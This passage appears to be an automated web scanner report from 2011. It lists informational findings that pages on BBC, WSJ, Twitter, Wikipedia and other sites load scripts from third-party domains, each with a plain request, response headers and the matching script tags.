Keep-Alive: timeout=10, max=792
Expires: Tue, 03 May 2011 13:24:24 GMT
Connection: close
Set-Cookie: BBC-UID=34cd4c40409250f8085ec3c921c41698c30a233970c08233975d83f5e6c1d5460Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:24 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=34cd4c40409250f8085ec3c921c41698c30a233970c08233975d83f5e6c1d5460Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:24 GMT; path=/; domain=bbc.co.uk;
Content-Length: 50048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.8.15//desktop/2.7/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.3.js"> </script>
...[SNIP]...
<!-- Javascript -->


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/3_6/bbc_fmtj_config_v4.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/ticker/v1_2_0/ticker.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_63/bbccom.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_32/adsense_write.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_52/s_code.js"></script>
...[SNIP]...

23.35. http://news.bbc.co.uk/sport2/hi/football/13265403.stm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/football/13265403.stm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sport2/hi/football/13265403.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:24 GMT
Keep-Alive: timeout=10, max=800
Expires: Tue, 03 May 2011 13:24:24 GMT
Connection: close
Set-Cookie: BBC-UID=643d9c10a0c2d0e8ac0f3690915614f23faa777440c021292beb63de88eda35a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:24 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=643d9c10a0c2d0e8ac0f3690915614f23faa777440c021292beb63de88eda35a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:24 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.8.15//desktop/2.7/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.3.js"> </script>
...[SNIP]...
<!-- Javascript -->


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/3_6/bbc_fmtj_config_v4.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/ticker/v1_2_0/ticker.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_63/bbccom.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_32/adsense_write.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_52/s_code.js"></script>
...[SNIP]...

23.36. http://news.bbc.co.uk/sport2/hi/formula_one/13267766.stm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/formula_one/13267766.stm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sport2/hi/formula_one/13267766.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:26 GMT
Keep-Alive: timeout=10, max=795
Expires: Tue, 03 May 2011 13:24:26 GMT
Connection: close
Set-Cookie: BBC-UID=64cd0c50202200caeed98baf71322f665e5ca9bb10f0c18a64cbfae4b0dcf6520Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:26 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=64cd0c50202200caeed98baf71322f665e5ca9bb10f0c18a64cbfae4b0dcf6520Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:26 GMT; path=/; domain=bbc.co.uk;
Content-Length: 51648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.8.15//desktop/2.7/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.3.js"> </script>
...[SNIP]...
<!-- Javascript -->


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/3_6/bbc_fmtj_config_v4.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/ticker/v1_2_0/ticker.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_63/bbccom.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_32/adsense_write.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_52/s_code.js"></script>
...[SNIP]...

23.37. http://online.wsj.com/article/BT-CO-20110428-705019.html/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/BT-CO-20110428-705019.html/x22

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /article/BT-CO-20110428-705019.html/x22 HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:24:28 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=aa0f634f-2160-4807-9b6f-dd9894b18d38; domain=.wsj.com; path=/; Expires=Fri Apr 30 09:24:28 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Wed, 02-May-2012 13:24:28 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep07 - Mon 05/02/11 - 00:46:42 EDT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=36
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 82539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script type="text/javascript" src="http://adsyndication.msn.com/delivery/getads.js">
</script>
...[SNIP]...

23.38. http://picasaweb.google.com/lh/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /lh/view

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /lh/view?q=barkley+bank&um=1&ie=UTF-8&sa=N&hl=en&tab=wq HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Expires: Tue, 03 May 2011 13:23:22 GMT
Date: Tue, 03 May 2011 13:23:22 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=_M2A6TmMWV3e; Path=/; HttpOnly
Set-Cookie: S=photos_html=BN-ZTKF8p8ulsg-iHtnWgA; Domain=.google.com; Path=/; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<body onload="_report();_onload();"
class="lhcl_lang_en_US goog-app
lhcl_googlephotos_body">
<script src="http://lh3.ggpht.com/s/v/73.27/script/lh_searchview.js"></script>
...[SNIP]...

23.39. http://randomfactsthailand.com/thailand-breast-slap-sudden-breast-growth-without-surgery/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://randomfactsthailand.com
Path:   /thailand-breast-slap-sudden-breast-growth-without-surgery/x22

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /thailand-breast-slap-sudden-breast-growth-without-surgery/x22 HTTP/1.1
Host: randomfactsthailand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:25:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
X-Pingback: http://randomfactsthailand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 03 May 2011 13:25:31 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...

23.40. http://sorgalla.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sorgalla.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: sorgalla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:25:53 GMT
Server: Apache
Vary: Cookie
WP-Super-Cache: Served legacy cache file
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html; charset="UTF-8"
Content-Length: 39514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="de-DE">
<head profi
...[SNIP]...
</script><script type="text/javascript" src="http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...
<!--stats_footer_test--><script src="http://stats.wordpress.com/e-201118.js" type="text/javascript"></script>
...[SNIP]...

23.41. http://sorgalla.com/jcarousel/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sorgalla.com
Path:   /jcarousel/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jcarousel/ HTTP/1.1
Host: sorgalla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:25:52 GMT
Server: Apache
Vary: Cookie
WP-Super-Cache: Served legacy cache file
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html; charset="UTF-8"
Content-Length: 13254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="de-DE">
<head profi
...[SNIP]...
</script><script type="text/javascript" src="http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...
<!--stats_footer_test--><script src="http://stats.wordpress.com/e-201118.js" type="text/javascript"></script>
...[SNIP]...

23.42. http://th.wikipedia.org/wiki/รายŕ¸?ืŕą?อŕ¸?ŕ¸?าŕ¸?ารŕą?ŕ¸?ŕ¸?ระŕą?ŕ¸?ศŕą?ŕ¸?ย  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://th.wikipedia.org
Path:   /wiki/........................................................................

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wiki/........................................................................ HTTP/1.1
Host: th.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:23:00 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
Content-Language: th
Vary: Accept-Encoding,Cookie
Last-Modified: Sat, 05 Feb 2011 15:41:59 GMT
Content-Length: 60384
Content-Type: text/html; charset=UTF-8
Age: 254
X-Cache: HIT from sq61.wikimedia.org
X-Cache-Lookup: HIT from sq61.wikimedia.org:3128
X-Cache: MISS from sq76.wikimedia.org
X-Cache-Lookup: MISS from sq76.wikimedia.org:80
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="th" dir="ltr" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
...[SNIP]...
</script><script src="http://bits.wikimedia.org/w/extensions-1.17/WikimediaMobile/MobileRedirect.js?8.2" type="text/javascript"></script>
...[SNIP]...
<!-- /footer -->
       
<script src="http://bits.wikimedia.org/th.wikipedia.org/load.php?debug=false&amp;lang=th&amp;modules=startup&amp;only=scripts&amp;skin=vector" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://bits.wikimedia.org/th.wikipedia.org/load.php?debug=false&amp;lang=th&amp;modules=site&amp;only=scripts&amp;skin=vector" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://geoiplookup.wikimedia.org/"></script>
...[SNIP]...

23.43. http://translatewiki.net/wiki/MediaWiki:Collapsible-collapse/en  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translatewiki.net
Path:   /wiki/MediaWiki:Collapsible-collapse/en

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wiki/MediaWiki:Collapsible-collapse/en HTTP/1.1
Host: translatewiki.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Content-type: text/html; charset=UTF-8
Content-language: en
Vary: Accept-Encoding, Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-Modified: Thu, 23 Dec 2010 23:09:01 GMT
Connection: close
Date: Tue, 03 May 2011 13:27:41 GMT
Server: lighttpd/1.4.26
Content-Length: 16524

<!DOCTYPE html>
<html lang=en dir=ltr>
<title>MediaWiki:Collapsible-collapse/en - translatewiki.net</title>
<meta charset=UTF-8>
<meta name=generator content="MediaWiki 1.18alpha">
<link rel="shortcut
...[SNIP]...
</script>
<script type="text/javascript"
src="//pagead2.googleadservices.com/pagead/show_ads.js">

</script>
...[SNIP]...

23.44. http://translatewiki.net/wiki/MediaWiki:Collapsible-expand/en  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translatewiki.net
Path:   /wiki/MediaWiki:Collapsible-expand/en

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wiki/MediaWiki:Collapsible-expand/en HTTP/1.1
Host: translatewiki.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Content-type: text/html; charset=UTF-8
Content-language: en
Vary: Accept-Encoding, Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-Modified: Thu, 23 Dec 2010 23:08:56 GMT
Connection: close
Date: Tue, 03 May 2011 13:27:41 GMT
Server: lighttpd/1.4.26
Content-Length: 16486

<!DOCTYPE html>
<html lang=en dir=ltr>
<title>MediaWiki:Collapsible-expand/en - translatewiki.net</title>
<meta charset=UTF-8>
<meta name=generator content="MediaWiki 1.18alpha">
<link rel="shortcut i
...[SNIP]...
</script>
<script type="text/javascript"
src="//pagead2.googleadservices.com/pagead/show_ads.js">

</script>
...[SNIP]...

23.45. http://trends.atipat.co.cc/thailand-breast-slap/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trends.atipat.co.cc
Path:   /thailand-breast-slap/x22

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /thailand-breast-slap/x22 HTTP/1.1
Host: trends.atipat.co.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:27:44 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
X-Pingback: http://trends.atipat.co.cc/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=1280c352f0a6df747643c1f2abd26d8e; path=/
Last-Modified: Tue, 03 May 2011 13:27:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head pro
...[SNIP]...
<!--stats_footer_test--><script src="http://stats.wordpress.com/e-201118.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript1.1" src="http://tracker.stats.in.th/tracker.php?uid=29302"></script>
...[SNIP]...

23.46. http://truehits.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://truehits.net
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: truehits.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Tue, 03 May 2011 13:27:46 GMT
Server: Apache
Content-Length: 52037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="search" type="ap
...[SNIP]...
</script>

-->
<script type="text/javascript" src="http://addoer.com/showfixads.php?tabname=g0000015"></script>
...[SNIP]...

23.47. http://truehits.net/stat.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://truehits.net
Path:   /stat.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /stat.php?id=q0027704 HTTP/1.1
Host: truehits.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Tue, 03 May 2011 13:27:48 GMT
Server: Apache
Content-Length: 50379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="search" type="ap
...[SNIP]...
</div>-->

<script type="text/javascript" src="http://paidoo.net/js/paidoo_mynews.js"></script>
...[SNIP]...

23.48. http://tv.popcrunch.com/snl-commercials-barkleys-bank-peepers-insurance-video/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tv.popcrunch.com
Path:   /snl-commercials-barkleys-bank-peepers-insurance-video/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /snl-commercials-barkleys-bank-peepers-insurance-video/ HTTP/1.1
Host: tv.popcrunch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:27:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Vary: Accept-Encoding,Cookie
Cache-Control: max-age=3, must-revalidate
WP-Super-Cache: Served supercache file from PHP
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<!-- End comScore Tag -->


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script>

<script type="text/javascript"

src="http://pagead2.googlesyndication.com/pagead/show_ads.js">


</script>
...[SNIP]...
</script>
<script async="async" defer="defer" src="http://scribol.com/txwidget1.2.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"

src="http://pagead2.googlesyndication.com/pagead/show_ads.js">


</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
<!-- Kontera ContentLink(TM) -->            

       
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>


<script src="http://pmetrics.performancing.com/958.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://cdn.gumgum.com/javascripts/ggv2.js"></script>
...[SNIP]...

23.49. http://twitter.com/KBank_Live  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /KBank_Live

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /KBank_Live HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:27:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304429270-36774-61300
ETag: "9236e9ba3a0e891747be7255c635d244"
Last-Modified: Tue, 03 May 2011 13:27:50 GMT
X-Runtime: 0.00769
Content-Type: text/html; charset=utf-8
Content-Length: 53135
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1304429270340580; path=/; expires=Tue, 10-May-11 13:27:50 GMT; domain=.twitter.com
Set-Cookie: guest_id=130442927034781083; path=/; expires=Thu, 02 Jun 2011 13:27:50 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCEwVC7YvAToHaWQiJTExMWU1MmMyYTgzNDNl%250AZjQyZmZhNGQxNDI3NjdjN2E0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--96123277011b42aa09089579184a6267a5490ead; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1304118205/javascripts/twitter.js?1304355815" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1304118205/javascripts/lib/jquery.tipsy.min.js?1303492997" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1304118205/javascripts/lib/gears_init.js?1303492997" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1304118205/javascripts/lib/mustache.js?1303492997" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1304118205/javascripts/geov1.js?1303492996" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1304118205/javascripts/api.js?1303492996" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1304118205/javascripts/lib/mustache.js?1303492997" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1304118205/javascripts/dismissable.js?1303492996" type="text/javascript"></script>
...[SNIP]...

23.50. http://twitter.com/ktb_care  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /ktb_care

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ktb_care HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:27:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304429269-53062-58419
ETag: "cbafa3883481612c4be62e572b1b077f"
Last-Modified: Tue, 03 May 2011 13:27:49 GMT
X-Runtime: 0.00689
Content-Type: text/html; charset=utf-8
Content-Length: 51047
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1304429269377500; path=/; expires=Tue, 10-May-11 13:27:49 GMT; domain=.twitter.com
